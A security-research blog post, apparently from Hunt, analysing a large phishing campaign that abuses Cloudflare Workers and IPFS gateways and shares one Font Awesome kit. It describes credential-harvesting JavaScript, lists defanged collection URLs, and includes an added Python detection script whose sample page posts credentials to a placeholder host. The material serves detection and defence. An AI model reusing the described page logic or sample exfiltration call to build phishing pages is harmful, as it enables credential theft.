One Font, Countless Frauds: Exposing Large-Scale Phishing Activity Abusing Cloudflare

Published on Nov 7, 2024

Exposing Massive Phishing Scams Abusing Cloudflare Services

Introduction 

At Hunt, we seek to move beyond open directories and malware C2 frameworks. Our research team actively seeks out emerging threats using innovative tools like our experimental phishing crawler. Our commitment to ensuring our users and the broader security community are aware of ongoing threats led us to identify a widespread phishing campaign leveraging Cloudflare services.

What tipped us off? A shared Font Awesome kit across a massive number of websites hosting fake login pages. This discovery led us to over 60,000 links, most targeting login credentials for Microsoft's SharePoint and Office365 platforms. The campaign wasn't limited to Microsoft products; we've also encountered pages imitating DHL, Webmail Panels, and Mercari, to name a few.

In this post, we'll share some of the details of this interesting set of URLs in hopes it will help identify this threat before it hits your inbox.

What is Font Awesome?

Font Awesome is a popular library that easily integrates icons and fonts into web pages. Threat actors may find this toolkit (with over 30,000 items to choose from) valuable in tailoring the look of their phishing pages to create a sense of normalcy and trust for the user, making them less likely to suspect the phishing attempt.

Figure 1: Screenshot of Font Awesome setup page (source: https://fontawesome.com/start)

In this case, the particular Font Awesome kit used across the cluster of phishing domains is at https://kit[.]fontawesome[.]/585b051251.js.

The script's primary purpose is to manage the kit's configuration and loading of Font Awesome icons. It includes automatic SVG fetching (which requires a license), conflict detection, handling dynamic content changes, and ensuring icons are obtained from the correct location. 

Figure 2: Snippet of fontawesome-585b051251.js (source: urlscan.io)

Phishing Activity Details

As all the phishing domains we found are hosted on Cloudflare, it's only fitting that they use their services. In this activity set, the scammers used either Cloudflare IPFS Gateways, distributing content from a decentralized network, or Cloudflare Workers, a serverless execution environment, to mask their malicious intent. *A handful do not use either service.

Below is a quick explanation of how threat actors can abuse these services:

  • IPFS Gateways: Phishing actors can exploit IPFS gateways to host phishing content in a decentralized manner, making it potentially more challenging to track down and take down.

  • Cloudflare Workers: While a legitimate service, malicious actors can misuse Cloudflare Workers to host phishing content or other malicious scripts, potentially making them appear to originate from a trusted source (Cloudflare).

We won't attempt to analyze all 60,000+ URLs in this post. Let's dive into a few examples to understand better how these phishing actors operate.

ogukbm[.]nmbzts2qjn2150[.]workers[.]dev

The first link we will cover is hosted via CF Workers. It pretends to be an Adobe document, requiring users to enter their email credentials. The source code of the page is obfuscated by HTML character encoding. However, we can get around this by inspecting the page using the Web Developer tools.

Figure 3: Screenshot of HTML including Font Awesome and suspicious JavaScript.

The arrow near the top of the page highlights the Font Awesome 585b051251 script, and the second arrow shows JavaScript code buried at the bottom of the page. This code appears to deal with login functionality. Let's take a closer look.

Figure 4: JavaScript code found in ogukbm[.]nmbzts2qjn2150[.]workers[.]dev

Below is a brief breakdown of the code in Figure 4:

  1. The code checks for a value in the URL hash and uses it to pre-fill the email field (#email) if it exists.

  2. Upon submission of the form, the code prevents the default form submission behavior, retrieves the values from the email and password fields, and then clears the password field. 

  3. An error message indicates login failure, incrementing the counter (count) variable to track login attempts.

  4. After two failed attempts, the page redirects the user to the official Adobe website (line 24).

  5. Next, the code uses regex to validate that the information entered in the email field matches the basic structure of an email address.

  6. Finally, if the count variable is less than 2, the code extracts the email and password and sends an AJAX request to https://ugiuk[.]dyndns[.]dk/sign4/Adobe.php

*At the time of writing, the URL accepting the credentials is no longer responding.
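As an added example (not code from the Hunt post), the following Python triage script undoes the HTML character-reference obfuscation described above, groups a page URL as Cloudflare Workers or an IPFS gateway, and flags a page that loads the shared 585b051251 kit while posting to a host other than its own. The sample page and the hosts in it are constructed placeholders, and the kit URL uses Font Awesome's standard kit host.

```python
import html
import re
from urllib.parse import urlparse

SHARED_KIT_ID = "585b051251"  # kit id shared across the campaign's pages

# Constructed sample page (not the real phishing page). It loads the shared
# kit, pre-fills #email from the URL hash and posts to a third-party host;
# "exfil.example" is a placeholder for the credential-collection server.
RAW_PAGE = """<html><head>
<script src="https://kit.fontawesome.com/585b051251.js"></script>
</head><body>
<form id="login"><input id="email"><input id="password" type="password"></form>
<script>
if (location.hash) document.getElementById('email').value = location.hash.substr(1);
$.ajax({url: 'https://exfil.example/sign4/Adobe.php', type: 'POST'});
</script></body></html>"""
# Obfuscated the way the post describes: every character as a numeric reference.
SAMPLE_PAGE = "".join(f"&#{ord(c)};" for c in RAW_PAGE)

NUMERIC_REF_RE = re.compile(r"&#x?[0-9a-f]+;", re.I)
KIT_RE = re.compile(r"kit\.fontawesome\.com/([0-9a-z]{10})\.js", re.I)
URL_RE = re.compile(r"""https?://[^\s'"<>]+""", re.I)


def deobfuscate(page: str) -> str:
    """Undo HTML character-reference obfuscation, repeating for nested refs."""
    prev = None
    while prev != page:
        prev, page = page, html.unescape(page)
    return page


def hosting_kind(page_url: str) -> str:
    """Group a URL the way the post groups the campaign's hosting."""
    u = urlparse(page_url)
    host = (u.hostname or "").lower()
    if host.endswith(".workers.dev"):
        return "cloudflare-workers"
    if u.path.startswith("/ipfs/") or ".ipfs." in host:  # path or subdomain gateway
        return "ipfs-gateway"
    return "other"


def analyze(page_url: str, page: str) -> dict:
    """Flag a fetched page that shows the campaign's traits."""
    src = deobfuscate(page)
    page_host = (urlparse(page_url).hostname or "").lower()
    hosts = {(urlparse(u).hostname or "").lower() for u in URL_RE.findall(src)}
    result = {
        "hosting": hosting_kind(page_url),
        "obfuscated": len(NUMERIC_REF_RE.findall(page)) > 100,
        "shared_kit": SHARED_KIT_ID in KIT_RE.findall(src),
        "hash_prefill": "location.hash" in src,
        "external_hosts": sorted(h for h in hosts
                                 if h and h not in (page_host, "kit.fontawesome.com")),
    }
    result["suspicious"] = result["shared_kit"] and bool(result["external_hosts"])
    return result
```

Run `analyze(url, body)` over pages your crawler fetches; a hit on `suspicious` together with a `workers.dev` or gateway hosting kind is the combination the post describes.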

weston1.html

Figure 5: Screenshot

Our second example leverages an IPFS gateway and a seemingly innocuous HTML page ('weston1.html') consisting of a Microsoft Word document to target Office365 credentials. The page also offers a "Sign in with Other Mail" option, suggesting a wider net for potential victims.

Again, in Figure 5, the arrows identify the Font Awesome script and a slightly more complex script buried at the bottom of the page.

Figure 6: Snippet of JavaScript code inside weston1.html

The above image only includes the portion of code used to send the credentials to what is likely an actor-controlled server. The actual script was a few hundred lines; I'll provide a quick overview:

  1. The script initializes a dialog box/popup window containing an embedded login image for Gmail, Outlook, AOL, Office365, Yahoo, and 'Other'.

  2. Like the first script, the code validates the email address input into the email field and sends the credentials to https://usefuxoil[.]shop/high/boloadobe.php.

  3. The code redirects the user to a URL using the domain extracted from the user's email, even if the login was unsuccessful.

biocareremedies[.]in/admin/em/mnx/

Our third and final example is an oddity among the large group of URLs identified. In the URL above, we see a domain likely spoofing some type of healthcare organization but also using India's top-level domain (TLD). The domain isn't uncommon, but the phishing page contains the title "NetEast Enterprise Email -- Login Portal," with a login field over presumably the target's LinkedIn page.

Figure 7: Screenshot of biocareremedies[.]in

The login field reads, "Email login timeout, please login again." NetEase is a large free e-mail provider within China, and the page uses a similar favicon often seen on 163[.]com webpages.

Figure 8: Snippet of JavaScript code for the spoofed LinkedIn page

A significant difference between the code in Figure 8 and the others we've looked at is that the attacker has decided not to send the credentials to additional infrastructure but to a PHP page. At the beginning of the script, a base64-encoded string (bmV4dC5waHa=), which decodes to 'next.php,' is initialized.

We can easily navigate to this page in the browser.

Figure 9: Error message at next.php

Conclusion

The continued rise of IPFS phishing highlights the need for security solutions that can adapt and learn. Anomaly detection tools that analyze traffic patterns and identify deviations from normal behavior offer a powerful approach to uncovering novel threats.

Sign up for Hunt today and be among the first to know when our crawler goes live. We will continue to inform the community as new phishing threats appear.
